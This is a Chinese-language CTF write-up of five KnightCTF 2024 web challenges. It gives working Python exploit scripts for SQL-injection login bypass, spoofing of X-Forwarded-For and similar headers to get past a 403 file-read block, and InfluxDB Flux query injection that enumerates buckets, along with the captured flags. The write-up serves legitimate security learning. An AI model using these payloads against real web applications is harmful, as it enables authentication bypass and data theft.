KnightCTF 2024 WEB做题记录

WEB

Levi Ackerman

题目信息

Levi Ackerman is a robot! 

N:B: There is no need to do bruteforce. 

Author: saif

Target : http://66.228.53.87:5000/

我的解答：

签到题，题目提示了robot!

直接访问robots.txt得到路径

Disallow : /l3v1_4ck3rm4n.html

再次访问路径得到flag

KCTF{1m_d01n6_17_b3c4u53_1_h4v3_70}

Kitty

题目

Tetanus is a serious, potentially life-threatening infection that can be transmitted by an animal bite. 

N:B: There is no need to do bruteforce. 

Author: Munazir (YCF)

Target : http://45.33.123.243:5020/

我的解答：

弱口令？试一下admin不对，查看源代码js发现

Dashboard查看源代码修改if语句的信息即可："cat flag.txt"

即可得到flag

或者用SQL绕一下

import requests

session = requests.Session()

base_URL = 'http://45.33.123.243:5020/'

login_data = {
    'username': 'yes',
    'password': '" or 1=1; -- "'
}

req = session.post(f'{base_URL}login', json=login_data)

req = session.get(f'{base_URL}dashboard')

print(req.text)

这样就可以绕过登录名得到

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Modern Dashboard</title>
    <link rel="stylesheet" href="/static/dashboard.css">
</head>
<body>

<div class="container">
    <header>
        <h1>Welcome to the Dashboard</h1>
    </header>

    <section class="content">
        <h2>Latest Posts</h2>
        <div class="post">
            <h3>Post Title 1</h3>
            <p>This is some content for the first post.</p>
        </div>
        <div class="post">
            <h3>Post Title 2</h3>
            <p>This is some content for the second post.</p>
        </div>
        <div class="post">
            <h3>Post Title 3</h3>
            <p>This is some content for the third post.</p>
        </div>
        <!-- You can add more posts dynamically here -->
    </section>

    <section class="posts">
        <form id="postsForm" onsubmit="addPost(event)">
            <label for="post_input">Enter Post:</label><br>
            <input type="text" id="post_input" name="post_input">
            <button type="submit">Execute</button>
        </form>
    </section>
</div>

<script>
    function addPost(event) {
        event.preventDefault();
        const post_in = document.getElementById('post_input').value;

        if (post_in.startsWith('cat flag.txt')) {
            fetch('/execute', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded'
                },
                body: `post_input=${encodeURIComponent(post_in)}`
            })
            .then(response => response.text())
            .then(result => {
                const contentSection = document.querySelector('.content');
                const newPost = document.createElement('div');
                newPost.classList.add('post');
                newPost.innerHTML = `<h3>Flag Post</h3><p>${result}</p>`;
                contentSection.appendChild(newPost);
            });
        } else {
            const contentSection = document.querySelector('.content');
            const newPost = document.createElement('div');
            newPost.classList.add('post');
            newPost.innerHTML = `<h3>User Post</h3><p>${post_in}</p>`;
            contentSection.appendChild(newPost);
        }
    }
</script>

</body>
</html>

然后修改脚本获取flag

import requests

session = requests.Session()

base_URL = 'http://45.33.123.243:5020/'

# forms data with sql injection
login_data = {
    'username': 'yes',
    'password': '" or 1=1; -- "'
}

# Login to get access to dashboard
req = session.post(f'{base_URL}login', json=login_data)

# Set params
payload = {'post_input': 'cat flag.txt'}
headers = {'Content-Type': 'application/x-www-form-urlencoded'}

# Retrieve flag
req = session.post(f'{base_URL}execute', data=payload, headers=headers)

print(req.text)
#KCTF{Fram3S_n3vE9_L1e_4_toGEtH3R}

Gain Access 1

题目信息

The web challenges are very much similar to real life application bugs. This is going to be a series of Gain Access with 3 challenges unlocks upon solving one by one. By solving these challenges, you'll gain a practical knowledge of Authentication Bypass Vulnerabilites as well as business logic error. The only difference is you'll not get any bounty but you'll get flags. Give it a try. And keep in mind, Don't make it hard, keep it simple. All the best. Solve the challenges & be a cyber knight. 

No need to bruteforce. There's a rate limit. If you send continuous requests, you'll be blocked for 3 minutes.

Author: 0xt4req

Target : http://45.33.123.243:13556/

我的解答：

访问得到：

控制台发现账号： root@knightctf.com 

扫后台发现有个robots.txt

访问得到路径：/r3s3t_pa5s.php

进入出现提示：No token provided.

这里我们需要获取到token。。。。抓包吧！

在忘记密码的地方把邮箱输进去进行提交抓包得到token

然后我们继续回到/r3s3t_pa5s.php输入这个token便可重建密码

完成后会提示：Password Updated Succesfully.

再次登录进去就会发现flag。。。

或者我们也可以绕过password参数

exp:

import requests

session = requests.Session()

base_URL = 'http://45.33.123.243:13556/'

req = session.get(f'{base_URL}')

login_data = {
    'admin_email': 'root@knightctf.com',
    'admin_password': "' or 1=1; -- ",
    'submit_btn': "Submit"
}

req = session.post(f'{base_URL}index.php', data=login_data)

print(req.text)

#KCTF{ACc0uNT_tAk3Over}

README

题目信息

Read me if you can!!

N:B: There is no need to do bruteforce. 

Author: saif

Target : http://66.228.53.87:8989/

我的解答：

输入字段读取文件。。。写个脚本读取

import requests

base_URL = 'http://66.228.53.87:8989/'

file = "text.txt"

req = requests.get(f'{base_URL}fetch?file={file}')

print(req.text)
#{"result":"Yes! You can read files! Dont ask for hint its ezz!!"}

读取flag.txt得到错误

{"result":"403 Access Denied"}

我们需要绕过这个错误（本地读取即可）

import requests

base_URL = 'http://66.228.53.87:8989/'

file_path = "flag.txt"

# headers to bypass 403 Access Denied error
headers = {
    'X-Originating-IP': '127.0.0.1',
    'X-Forwarded-For': '127.0.0.1',
    'X-Forwarded': '127.0.0.1',
    'Forwarded-For': '127.0.0.1',
    'X-Remote-IP': '127.0.0.1',
    'X-Remote-Addr': '127.0.0.1',
    'X-ProxyUser-Ip': '127.0.0.1',
    'X-Original-URL': '127.0.0.1',
    'Client-IP': '127.0.0.1',
    'True-Client-IP': '127.0.0.1',
    'Cluster-Client-IP': '127.0.0.1',
    'X-ProxyUser-Ip': '127.0.0.1',
    'Host': 'localhost'
}

req = requests.get(f'{base_URL}fetch?file={file_path}', headers=headers)

print(req.text)
#{"result":"KCTF{kud05w3lld0n3!}"}

Fluxx

题目信息

Recently I have made a simple app for monitoring and analyzing metrics, events, and real-time data.I used a database which is designed for handling high volumes of timestamped data. But I think its vulnerable find it and get he flag.

To be noted: The challenge resets after sometime. So please wait for a while if you see any error. 

Author: saif

Target : http://66.228.53.87:9001/

我的解答：

访问网站

Please visit /query?data= to travel with time.

简单发送一下数据试试

import requests

base_URL = 'http://66.228.53.87:9001/'

data = '1" OR 1=1--'

req = requests.get(f'{base_URL}query?data={data}')

print(req.text)

得到信息

HttpError: compilation failed: error @1:82-1:158: expected RPAREN, got EOF

error @1:152-1:153: invalid expression @1:151-1:152: =

error @1:155-1:158: got unexpected token in string expression @1:158-1:158: EOF

根据题目信息自行搜索发现一篇参考文章介绍了这个错误：https://community.influxdata.com/t/query-throws-rparen-got-eof-error/18940

新知识：InfluxDB nosql注入 可参考：https://rafa.hashnode.dev/influxdb-nosql-injection

") |> yield(name: "1337") 
buckets() |> filter(fn: (r) => r.name =~ /^a.*/ and die(msg:r.name)) 
//

爆破exp:

import requests, urllib.parse

base_URL = 'http://66.228.53.87:9001/'

letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

for char in list(letters):

    payload = f'") |> yield(name: "1337")\nbuckets() |> filter(fn: (r) => r.name =~ /^{char}.*/ and die(msg:r.name))\n//'

    encoded_payload = urllib.parse.quote(payload, safe='')
    req = requests.get(f'{base_URL}query?data={encoded_payload}')

    if req.text != '[]':
        print(req.text)

#KCTF{g0UPqVWa0eUT2wF2ipzX3v5pxikvqYhxR9OL}